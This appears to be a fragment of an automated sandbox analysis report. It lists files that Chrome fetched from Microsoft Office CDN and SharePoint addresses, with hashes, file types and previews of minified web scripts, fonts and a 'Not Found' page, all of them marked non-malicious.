                                        Entropy (8bit):7.980063194151935
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:2838E6EAA5CC9BC94D3327E2720D2496
                                        SHA1:734C1F1975B0CCB39F477C2632697BC705626664
                                        SHA-256:AB1D3AA0425DAAC126739A9566B0435EF577F88F777315EB1E9CEE14FE7DB810
                                        SHA-512:230945D032756D1DAFBE567D49E9B93C265A2935FFCCC92A914A64ED4D96244A7547B04C3D890AA0BAC67295A0A4112EBC93F277C406B37F74B53EF8460599A0
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-5-3d537ea4.woff
                                        Preview:wOFF......>$......}<........................OS/2.......G...`,.s.cmap...P........@3(.gasp................glyf......5...l..t..head..8....4...6#...hhea..9........$....hmtx..9,...[.... ...loca..9.........G.d6maxp..:T....... .z.~name..:l.......O..R.post..>........ ....x.c`a..8...........L..t.!.I.(......@9......VP`px2..b.0.B2..@x....R..%.x...](.a.......B'..{.....\(u"2s.DM.....\X.In. .).k+s!.jnh.ZyimKD....1......v....<.......QJ....V.^.i_O.o.4}.....*u...t...Nf1..v....c?.9.a.r....4g9...".....r....W~.w..6w..=.....zx.c..o....CL.HB.".b.H.DI......8..DI.4qJ.d.Sy&.......%.L..x.J.......;...\._.n......ny.}......}^.....s.....j...|..>a.-hF.f.iL.......P.w(@......"t......Z..<...[. ...B=J.}.....HF...@.~.%.6..$D.9.:..0Xt...o.`@.....]KYP..?...0?..../4.#...............x..}.x...9S.h...4[.uV.Z..{eI.m..r.;6....6.&...ll.`...:!...%.$...H.{.{..G.K./@..<.xp..;~........}..fv.9....?..x.......@.....|....e#.....~..Q~..S......^2...i...gk/......+..$.xk..Z.s...r.....4{..0..tQ0p.co|t..Go<v.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (10451)
                                        Category:downloaded
                                        Size (bytes):15727
                                        Entropy (8bit):5.2372360674370135
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:680B62004CB6E91A48C08F1DBFA466D1
                                        SHA1:515269C7BBEEC6B3AA43D593FF3DCFF76BE0AE2C
                                        SHA-256:AF34FF482AEF3988E7E7E46E21DCD5173B57D66181B3326236D7AA9467200B0D
                                        SHA-512:2F6CF3CAB20858B01FBBDAD6FD3F9F01B57BB2EE71C71866EAC711ADD47BE4CCA2CCF2981AE6CE7954BF68D67ED8AC3D1F10784F0CF3B4C4B77B08FB5090EDCF
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/7.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[7],{5925:function(e,t,n){n.d(t,{a:function(){return D}});var a,i=n(37),r=n("tslib_102"),o=n("react-lib"),s=n(2518),c=n(82),d=n(33),l=n(127),u=n("fui.util_369"),f=n(141),p=n(1024),m=n(47),_=n(2529),h=(0,d.a)(),b="TextField",g=function(e){function t(t){var n=e.call(this,t)||this;n._textElement=o.createRef(),n._onFocus=function(e){n.props.onFocus&&n.props.onFocus(e),n.setState({isFocused:!0},function(){n.props.validateOnFocusIn&&n._validate(n.value)})},n._onBlur=function(e){n.props.onBlur&&n.props.onBlur(e),n.setState({isFocused:!1},function(){n.props.validateOnFocusOut&&n._validate(n.value)})},n._onRenderLabel=function(e){var t=e.label,a=e.required,i=n._classNames.subComponentStyles?n._classNames.subComponentStyles.label:void 0;return t?o.createElement(s.a,{required:a,htmlFor:n._id,styles:i,disabled:e.disabled,id:n._labelId},e.label):null},n._onRenderDescription=function(e){return e.description?o.createElement(
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):30974
                                        Entropy (8bit):5.178451362877261
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:6CAEB793E98D89F169CC00DB1AB89698
                                        SHA1:685D83EEEABD92E0A4AA4148806371BBD0EA3338
                                        SHA-256:6BDF1360711F66AE596BD6FABF21F31E4BD10B6E31D544B5E1680CF690AC5E40
                                        SHA-512:73D77F4585E460BB7D140C55B623A6161344ABDCF5A68308AA1C4CE1458C48AA8561AFE2C30D16F6A87A323904EC3FB19FCA87CE5ECE2D0DA0EC954E802E0A7B
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:{"Architecture":1,"Audience":1,"Resources":{"Version":"1.20240906.4.0","CatalogXml":"<ResourceCatalog>\r\n <Resources>\r\n <Resource Key=\"_store_mecontrol-fluent-web_3_28_4-preview_4-6878c0a7c72dfd36d165_node_modules_mecontrol_flue-95d063\" Type=\"LTRRTLPath\">\r\n <RTLPath>suiteux.shell._store_mecontrol-fluent-web_3_28_4-preview_4-6878c0a7c72dfd36d165_node_modules_mecontrol_flue-95d063.e6651788306428d03515.rtl.js</RTLPath>\r\n <LTRPath>suiteux.shell._store_mecontrol-fluent-web_3_28_4-preview_4-6878c0a7c72dfd36d165_node_modules_mecontrol_flue-95d063.e6651788306428d03515.js</LTRPath>\r\n </Resource>\r\n <Resource Key=\"_store_mecontrol-fluent-web_3_28_4-preview_4-6878c0a7c72dfd36d165_node_modules_mecontrol_flue-9b5d4b\" Type=\"LTRRTLPath\">\r\n <RTLPath>suiteux.shell._store_mecontrol-fluent-web_3_28_4-preview_4-6878c0a7c72dfd36d165_node_modules_mecontrol_flue-9b5d4b.8c9db2fc0be4aa733556.rtl.js</RTLPath>\r\n <LTRPath>suiteux.shell._store_mecontrol-fluent-we
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (7410)
                                        Category:dropped
                                        Size (bytes):35334
                                        Entropy (8bit):5.413356284756739
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:948264FB8D981D42FA2529A0141FE347
                                        SHA1:290F0721ADCCD645401CE1D450D7F7D9AF4961CE
                                        SHA-256:E0ACF2FDF49F2E17C3E85DBCDBB84288053461898D351E355E6858A8943691B9
                                        SHA-512:2932C3141A6F8D7877C2885D208D14E89D07DB822018B003B0D4A16EC682B808AE743B63DD58CF9ABBBA9C79526A9F091F62487D0460A59BAA64BF9CE91617C2
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[144],{2654:function(e,t,n){"use strict";n.d(t,{a:function(){return l}});var a=n("tslib_102"),i=n("react-lib"),r=n("fui.core_351"),o=n(336),s=n("fui.util_369"),c=n(2652),d=n(2653);function l(e,t){void 0===t&&(t={});var n=t.factoryOptions,l=(void 0===n?{}:n).defaultProp,f=function(n){var c,d,l,f,p=(c=t.displayName,d=i.useContext(o.a),l=t.fields,f=["theme","styles","tokens"],s.su.getSettings(l||f,c,d.customizations)),m=t.state;m&&(n=(0,a.W_)((0,a.W_)({},n),m(n)));var _=n.theme||p.theme,h=u(n,_,t.tokens,p.tokens,n.tokens),b=function(e,t,n){for(var a=[],i=3;i<arguments.length;i++)a[i-3]=arguments[i];return r.BPT.apply(void 0,a.map(function(a){return"function"==typeof a?a(e,t,n):a}))}(n,_,h,t.styles,p.styles,n.styles),g=(0,a.W_)((0,a.W_)({},n),{styles:b,tokens:h,_defaultStyles:b,theme:_});return e(g)};return f.displayName=t.displayName||e.name,l&&(f.create=(0,c.a)(f,{defaultProp:l})),(0,d.a)(f,t.statics),f}function u(e,t){for(v
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (57084)
                                        Category:downloaded
                                        Size (bytes):62456
                                        Entropy (8bit):4.835792491262597
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:834A822CA8F28275805AB85EB9E2129A
                                        SHA1:24D0D399741EBAF1AA28BBE8071CC33C554DA8C3
                                        SHA-256:AB2094C2BDB62098F94A2203DCCA2D8187FE87C23867E4897F830E601C0150FA
                                        SHA-512:705B6FD8E4D33A9B2AE5B450023E96B276B8B69FC8094AF66FF6C8B501E9E8758FB074096B0AA1E18C75B053AC877355181299E49E8D7F0C2A4BE5C0C8EA3C79
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/stsserviceworkerprefetch/stsserviceworkerprefetch.js
                                        Preview:.if (typeof self !== 'undefined') {. const versionedPaths = ["@ms/stream-bundle/chunks/14096.js","@ms/stream-bundle/chunks/14389.js","@ms/stream-bundle/chunks/14727.js","@ms/stream-bundle/chunks/16632.js","@ms/stream-bundle/chunks/17840.js","@ms/stream-bundle/chunks/22663.js","@ms/stream-bundle/chunks/26396.js","@ms/stream-bundle/chunks/28580.js","@ms/stream-bundle/chunks/29386.js","@ms/stream-bundle/chunks/31544.js","@ms/stream-bundle/chunks/33693.js","@ms/stream-bundle/chunks/34876.js","@ms/stream-bundle/chunks/35998.js","@ms/stream-bundle/chunks/36074.js","@ms/stream-bundle/chunks/37323.js","@ms/stream-bundle/chunks/37636.js","@ms/stream-bundle/chunks/38661.js","@ms/stream-bundle/chunks/43044.js","@ms/stream-bundle/chunks/44814.js","@ms/stream-bundle/chunks/46836.js","@ms/stream-bundle/chunks/47069.js","@ms/stream-bundle/chunks/51542.js","@ms/stream-bundle/chunks/58148.js","@ms/stream-bundle/chunks/61782.js","@ms/stream-bundle/chunks/68691.js","@ms/stream-bundle/chunks/70906.js","@
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Unicode text, UTF-8 text, with very long lines (65308), with no line terminators
                                        Category:downloaded
                                        Size (bytes):272685
                                        Entropy (8bit):5.704339403913183
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:4B388273D337DC67785E5F7853C09839
                                        SHA1:D91D870126D61F6E4BF8AEF3D6C482D9BF431F6B
                                        SHA-256:5718640C19EDDF9FB27EF47B8812DD0DB6A670E956364BB0F11A811A6BBE3845
                                        SHA-512:25166EDC93CF0267C532B3DC79B82E1205246F50E3F23D5D7CFE693B73DB33D133AF4BB03B6DE6251F7A0A7FA00D4C01D39697B9C8A5A89E88D540A0918E785C
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://shell.cdn.office.net/shellux/suiteux.shell.core.63097f17886144cab412.js
                                        Preview:var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_core_start"),function(){var e,t,n,o,r,i={12792:function(e,t,n){"use strict";var o;n.d(t,{f:function(){return o}}),function(e){e.depth0="0 0 0 0 transparent",e.depth4="0 1.6px 3.6px 0 rgba(0, 0, 0, 0.132), 0 0.3px 0.9px 0 rgba(0, 0, 0, 0.108)",e.depth8="0 3.2px 7.2px 0 rgba(0, 0, 0, 0.132), 0 0.6px 1.8px 0 rgba(0, 0, 0, 0.108)",e.depth16="0 6.4px 14.4px 0 rgba(0, 0, 0, 0.132), 0 1.2px 3.6px 0 rgba(0, 0, 0, 0.108)",e.depth64="0 25.6px 57.6px 0 rgba(0, 0, 0, 0.22), 0 4.8px 14.4px 0 rgba(0, 0, 0, 0.18)"}(o||(o={}))},83779:function(e,t,n){"use strict";n.d(t,{I:function(){return c}});var o=/[\(\[\{\<][^\)\]\}\>]*[\)\]\}\>]/g,r=/[\0-\u001F\!-/:-@\[-`\{-\u00BF\u0250-\u036F\uD800-\uFFFF]/g,i=/^\d+[\d\s]*(:?ext|x|)\s*\d+$/i,s=/\s+/g,a=/[\u0600-\u06FF\u0750-\u077F\u08A0-\u08FF\u1100-\u11FF\u3130-\u318F\uA960-
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (7232)
                                        Category:dropped
                                        Size (bytes):37942
                                        Entropy (8bit):5.463762034178193
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:1EFF4E39A995FDE3FA357E655C979CE6
                                        SHA1:D8E6CB0490FBA15A524340770FBAA9689BE5DC5D
                                        SHA-256:19022EDB509E8E787A7A3377892CB422286F37709807A69F71453396405C6132
                                        SHA-512:CFE9204B8E9356A55FE20BF2DE3BCAFF720E621A62E839DE746EC00DDCA70286643B8B82028C05990BA6935517380319F5069AF16ED2F1C5DE7A141925AC467E
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[135],{3869:function(e,t,n){n.d(t,{a:function(){return i}});var a=n("fui.util_369"),i=(0,a.Ww)(function(e,t,n,i){return{root:(0,a.J4)("ms-ActivityItem",t,e.root,i&&e.isCompactRoot),pulsingBeacon:(0,a.J4)("ms-ActivityItem-pulsingBeacon",e.pulsingBeacon),personaContainer:(0,a.J4)("ms-ActivityItem-personaContainer",e.personaContainer,i&&e.isCompactPersonaContainer),activityPersona:(0,a.J4)("ms-ActivityItem-activityPersona",e.activityPersona,i&&e.isCompactPersona,!i&&n&&2===n.length&&e.doublePersona),activityTypeIcon:(0,a.J4)("ms-ActivityItem-activityTypeIcon",e.activityTypeIcon,i&&e.isCompactIcon),activityContent:(0,a.J4)("ms-ActivityItem-activityContent",e.activityContent,i&&e.isCompactContent),activityText:(0,a.J4)("ms-ActivityItem-activityText",e.activityText),commentText:(0,a.J4)("ms-ActivityItem-commentText",e.commentText),timeStamp:(0,a.J4)("ms-ActivityItem-timeStamp",e.timeStamp,i&&e.isCompactTimeStamp)}})
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Java source, ASCII text, with CRLF, LF line terminators
                                        Category:downloaded
                                        Size (bytes):896
                                        Entropy (8bit):5.3935669324256
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:E1D72BAE92A3640E80F887017E27A246
                                        SHA1:C20FA8E1786F4A1FE0216512FA4A6DF99348F7A0
                                        SHA-256:D08AF185A83BD1736B63818F41F0E2E77BE524DC3AC90C0D394A2C6EBF47E65E
                                        SHA-512:90B553D6E65CD73D6017AD17DAF6292668BE827801028F20565BE125ABB8BD086FE1412D0FB91DA88E859FACE2C4620D92E87832F6E8B01BEF09789BC5A4FBD8
                                        Malicious:false
                                        Reputation:unknown
                                        URL:"https://atlantarecyclingsolutions-my.sharepoint.com/_layouts/15/odspserviceworkerproxy.aspx?swManifestName=spserviceworker&debug=false&bypass=false&navigationPreloadHeaderValue=%7B%22supportsFeatures%22%3A%5B1855%2C61313%5D%7D&dataHost=Nucleus&applications=%5B%7B%22id%22%3A%22STS%22%2C%22swPrefetchManifestName%22%3A%22stsserviceworkerprefetch%22%7D%2C%7B%22id%22%3A%22SPHome%22%7D%2C%7B%22id%22%3A%22SitePages%22%7D%2C%7B%22id%22%3A%22Embed%22%7D%2C%7B%22id%22%3A%22CreateGroup%22%7D%2C%7B%22id%22%3A%22SingleWebPart%22%7D%2C%7B%22id%22%3A%22VivaHome%22%7D%2C%7B%22id%22%3A%22BrokerLogon%22%7D%2C%7B%22id%22%3A%22Clipchamp%22%7D%2C%7B%22id%22%3A%22MeeBridge%22%7D%2C%7B%22id%22%3A%22SPStart%22%7D%2C%7B%22id%22%3A%22Agreements%22%7D%5D&list=v2&prefetchListData=true&defaultBrotli=true&authenticateFast=true&inlineAuth=v2&wwData=true&enableTheming=true&prefetchFilebrowserPageInTeams=true&FUIV9Flights=[-83099905,3]&spStartApplicationWebBundle=true&enableIntegrities=true&streamViewServerLoad=true&streamInlineScript=true"
                                        Preview:..var _startTime=performance.now(),_startTimeTicks=Date.now();.var _shouldBypass=false;.var _cdnBaseUrl='https://res-1.cdn.office.net/files/odsp-web-prod_2024-08-23.009/';.var _swBuildNumber='odsp-web-prod_2024-08-23.009';.var _wwBuildNumber='odsp-web-prod_2024-08-23.009';.var _oneShellUrl='https://shell.cdn.office.net/api/ShellBootstrapper/business/OneShell';.var _wwKillSwitches={'48FEA7A5-5A77-480B-94EB-43F1937DF4D6':true};.var _killSwitches={"5F607A8D-6429-4962-B120-1EB1354EE6EA":true,"2ECA6C8B-E22D-4A59-9895-73D3E5800079":true};.var _prefetchBaseUrls={"stsserviceworkerprefetch":"https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/"};.importScripts('https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/stsserviceworkerprefetch/stsserviceworkerprefetch.js');.importScripts('https://res-1.cdn.office.net/files/odsp-web-prod_2024-08-23.009/spserviceworker.js');...
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (4621)
                                        Category:dropped
                                        Size (bytes):10149
                                        Entropy (8bit):5.195383022540428
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:66E6A0272C97493C8789878D93A726D3
                                        SHA1:88463FB0C3D06633E3A0E59C3725858257760AF9
                                        SHA-256:4D6566067C94975DA2170884B51036495D3F97228B5A84EA0C6B01EC31921F68
                                        SHA-512:3AA9F4D0810838E65356FDD3D465EA31CC33C639830F301C5A9CA9DD360A62DE3304CAFDB05ED76A5A9EA81D3983FD167017EAA7B0BB2DE155209714AA95E051
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[120],{3628:function(e,t,n){n.d(t,{a:function(){return s}});var a=n("tslib_102"),i=n("react-lib"),r=n(467),o=n(1489),s=function(e){return i.createElement(r.a,(0,a.W_)({},e),i.createElement(o.a,(0,a.W_)({disabled:e.hidden},e.focusTrapProps),e.children))}}.,4980:function(e,t,n){n.d(t,{a:function(){return d}});var a=n("tslib_102"),i=n("react-lib"),r=n(47),o=n(152),s=n(3628),c=n(467),d=function(e){var t=e.gapSpace,n=void 0===t?0:t,d=e.directionalHint,l=void 0===d?o.a.bottomLeftEdge:d,u=e.directionalHintFixed,f=e.targetElement,p=e.firstFocus,m=e.trapFocus,_=e.onLeave,h=e.className,b=e.finalHeight,g=e.content,v=e.calloutProps,y=(0,a.W_)((0,a.W_)((0,a.W_)({},(0,r.h)(e,r.f)),{className:h,target:f,isBeakVisible:!1,directionalHint:l,directionalHintFixed:u,finalHeight:b,minPagePadding:24,onDismiss:_,gapSpace:n}),v);return i.createElement(i.Fragment,null,m?i.createElement(s.a,(0,a.W_)({},y,{focusTrapProps:{forceFocusInsid
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:GIF image data, version 89a, 1 x 1
                                        Category:dropped
                                        Size (bytes):43
                                        Entropy (8bit):3.0314906788435274
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:325472601571F31E1BF00674C368D335
                                        SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                        SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                        SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:GIF89a.............!.......,...........D..;
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:HTML document, ASCII text, with very long lines (611)
                                        Category:downloaded
                                        Size (bytes):27150
                                        Entropy (8bit):4.357340680151037
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:46DD133EE00DC1BAE5E4EEBA7B88432F
                                        SHA1:8AF86A4AC91CE48C062216FB94A6E1D57618A19B
                                        SHA-256:9EB52EE46C7AB5EA4CA0982415DA99FDED1B7D7354F75E50847BDAE6CB44EB66
                                        SHA-512:CB49F9E3812E2C262AF374E79BD8905CB508A45BF2C2D6AF62EED85AF43770872486A55E9425882FEDA9FB3A57A317A3C18BE1E286ADAF0C76BE7F1B0DFA8474
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://pub-ae58b1db74294262a3845142a7ac908a.r2.dev/favicon.ico
                                        Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <link rel="icon" href="https://www.cloudflare.com/favicon.ico" />. <title>Not Found</title>. <style>. body {. font-family: system-ui;. font-weight: 300;. font-size: 1.25rem;. color: #36393a;. display: flex;. align-items: center;. justify-content: center;. }. main {. max-width: 1200px;. margin-top: 120px;. display: flex;. flex-wrap: wrap;. align-items: center;. justify-content: center;. }. #text {. max-width: 60%;. margin-left: 1rem;. margin-right: 1rem;. }. main > section > div {. margin-bottom: 3.25rem;. }. svg {. margin-left: 2rem;. }. @keyframes eye-1 {. 0% {. transform: translateX(0);. }. 10%,. 50% {. tr
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (59728)
                                        Category:downloaded
                                        Size (bytes):152665
                                        Entropy (8bit):5.341147828993421
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:307376C5D1BA1B4C17A5FAF244EEE399
                                        SHA1:DCB1F9A16A3A0B00560FD108864E78E37D8A907C
                                        SHA-256:559DA8F6A12C5F23D3F2978B156D4D175864C7F39F9CA117D1C14B9970948331
                                        SHA-512:0A150BA48EBAD54DE9EA60C2612316830970887230FB671477F89EB505EC5B4EAEEB32CEB3AB9A4F30C7E2A7D7E779B2ACC19D4A6EB893992DA88ED49DAE9514
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-08-23.009/spwebworker.js
                                        Preview:/*! For license information please see spwebworker.js.LICENSE.txt */.(()=>{"use strict";var e=[(e,t,n)=>{function a(e,t){for(var n="";n.length<e;){var a=16*(null!=t?t:Math.random)();n+=(a|=0).toString(16)}return n}function i(){return crypto.getRandomValues(new Uint32Array(1))[0]/4294967296}n.r(t),n.d(t,{Empty:()=>r,_guidRegEx:()=>o,cryptoRandom:()=>i,generate:()=>s,isValidGuid:()=>u,normalizeDashes:()=>l,normalizeLower:()=>c,normalizeUpper:()=>d});var r="00000000-0000-0000-0000-000000000000",o=/^[0-9a-f]{8}-?[0-9a-f]{4}-?[0-9a-f]{4}-?[0-9a-f]{4}-?[0-9a-f]{12}$/i;function s(e){var t=[];t.push(a(8,e)),t.push(a(4,e));var n="4"+a(3,e);t.push(n);var i=a(4,e),r=parseInt(i[0],16);return r&=3,i=(r|=8).toString(16)+i.substr(1),t.push(i),t.push(a(12,e)),t.join("-")}function c(e,t){return void 0===t&&(t=!1),e?f(e.toLowerCase(),t):""}function d(e,t){return void 0===t&&(t=!1),e?f(e.toUpperCase(),t):""}function l(e,t){if(void 0===t&&(t=!1),e){var n=e.replace(/[^A-Fa-f0-9]/g,"");if(32===n.length)retu
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (12800)
                                        Category:downloaded
                                        Size (bytes):3084392
                                        Entropy (8bit):5.409149056070838
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:455374DF0895C74B03086DACA72DD127
                                        SHA1:2B82278254E43293342C1E4B4D3703EFEFBF1B8C
                                        SHA-256:ECD13F6A82F8248C276553DDC9579DD0F540D03FBCC695C9EB71DE124310E412
                                        SHA-512:A5F071AB718026165DA7140152B54EC508B0665F4EBE53904A511C0EFA696DEF67E78883257715CE407F5858C38FDD48E4EDDDCA6F27B40ACA4ACBC9DD1F5129
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/odblightspeedwebpack.js
                                        Preview:/*! For license information please see odblightspeedwebpack.js.LICENSE.txt */.var __webpack_result__;(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odblightspeedwebpack"],[function(e,t,n){"use strict";n.d(t,{a:function(){return o},b:function(){return d},c:function(){return c},d:function(){return s}});var a=n(14),i=n(808),r=new Map,o=function(){function e(e){this.debugName=e;var t=this.id=(0,a.a)(e);r.set(t,this)}return e.get=function(e){if(!e)throw new Error("Unable to determine the Facet for an empty or undefined id.");var t=r.get(e);if(!t)throw new Error("Unable to determine the Facet for id '".concat(e,"'. ")+"Only store objects into a facet collection that have been created using the pack function. This error will typically occur if multiple versions of the @ms/items-view package have been bundled into the application.");return t},e.prototype.unpack=function(e){var t=this.id;if((0,i.a)()){var n=JSON.stringify(t);this.unpack=new Function("t","return t[".concat(n,"
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (14090)
                                        Category:downloaded
                                        Size (bytes):14189
                                        Entropy (8bit):5.176889714277119
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:5A46CF1515F5D943EC264170F35D680B
                                        SHA1:362FB492DADB36B6E018B020442996829336ADBE
                                        SHA-256:ADBF9D917ECC461444C471BB06C48177AB43BE65CD9D4792DB5D778103BE906D
                                        SHA-512:FA0366E6BF103754470B6C8512B8E15D11D72E0446015C3D947E2A4B0A8B4BAF47614231062B4CB1B578E090C2D940A08589689BD2E896533BCA40A13AA9DAF1
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/26.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[26],{2721:function(e,t,n){n.d(t,{a:function(){return y}});var a=n("tslib_102"),i=n("react-lib"),r=n("fui.util_369"),o=n(127),s=n(281),c=n(47),d=n(955),l=n(2722),u=n(143),f=function(e){if(void 0===e)return 0;var t=0;return"scrollTop"in e?t=e.scrollTop:"scrollY"in e&&(t=e.scrollY),Math.ceil(t)},p=function(e,t){"scrollTop"in e?e.scrollTop=t:"scrollY"in e&&e.scrollTo(e.scrollX,t)},m=n(142),_=n(282),h={top:-1,bottom:-1,left:-1,right:-1,width:0,height:0},b=function(e){return e.getBoundingClientRect()},g=b,v=b,y=function(e){function t(t){var n=e.call(this,t)||this;return n._root=i.createRef(),n._surface=i.createRef(),n._pageRefs={},n._getDerivedStateFromProps=function(e,t){return e.items!==n.props.items||e.renderCount!==n.props.renderCount||e.startIndex!==n.props.startIndex||e.version!==n.props.version||!t.hasMounted&&n.props.renderEarly&&(0,r.bg)()?(n._resetRequiredWindows(),n._requiredRect=null,n._measureVersion++
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (5768)
                                        Category:dropped
                                        Size (bytes):14831
                                        Entropy (8bit):5.326319093945959
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:1506464F8DEDE795526A2FFFD00CA20B
                                        SHA1:5C0521A4CCBD1F7E175354C38066FFCF7DB12BAD
                                        SHA-256:957B7F7B5A7CD1D30A32B212BA54650182EFD905F171E0327EDF5A9901F7EC0F
                                        SHA-512:5F0FC01E2596BE7463518780A7A56129E295684A4B9538CFDC518C0BB33DC73EED24257F38157CD1B1CA8A82F1C50DEF82992F507DE75B8C6D1396C9D2BE9D1B
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:/*! For license information please see 2.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[2],{4160:function(e,t,n){n.d(t,{a:function(){return i}});var a=n("react-lib");function i(e){const t=a.useContext(e);return!!t.version&&-1!==t.version.current}}.,8032:function(e,t,n){n.d(t,{a:function(){return C}});var a=n("react-lib"),i=n(498),r=n(237),o=n(8033),s=n("fui.core_351"),c=n(128),d=n(220),l=n(382),u=n(8020);const f=(0,s.pOW)("r6pzz3z",null,[".r6pzz3z{overflow-y:hidden;overflow-y:clip;scrollbar-gutter:stable;}"]),p=(0,s.pOW)("r144vlu9",null,[".r144vlu9{overflow-y:hidden;}"]);var m=n(160),_=n(159),h=n(8022),b=n(8029),g=n(8031);const v=[{opacity:0},{opacity:1}],y=(0,b.a)({enter:{keyframes:v,easing:g.a.curveLinear,duration:g.a.durationGentle},exit:{keyframes:[...v].reverse(),easing:g.a.curveLinear,duration:g.a.durationGentle}}),S=(0,s.pOW)("r1svjbtt","r131yuoq",{r:[".r1svjbtt{inset:0;padding:24px;margin:auto;border-style:none;overflow:unset;bor
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Web Open Font Format, TrueType, length 15284, version 1.3277
                                        Category:downloaded
                                        Size (bytes):15284
                                        Entropy (8bit):7.974395647957138
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:4F8DB599726C67A1F2148A89CCEF0E4E
                                        SHA1:6F8768D2D509951274C67E80306445457F5943E2
                                        SHA-256:A9663A3528ACB5A6463AAE06515A87F48EAB595ECD4CAFEBD582EEDBFC28F525
                                        SHA-512:C95C0859713DA78FB4487026A7BCD330D662C97260F133CE7F2CA8BDCF6242C563CE5CFB11B606122E51FEB04786C2F9B1A970C847304472C1CDD54175F4C548
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-17-8db36f62.woff
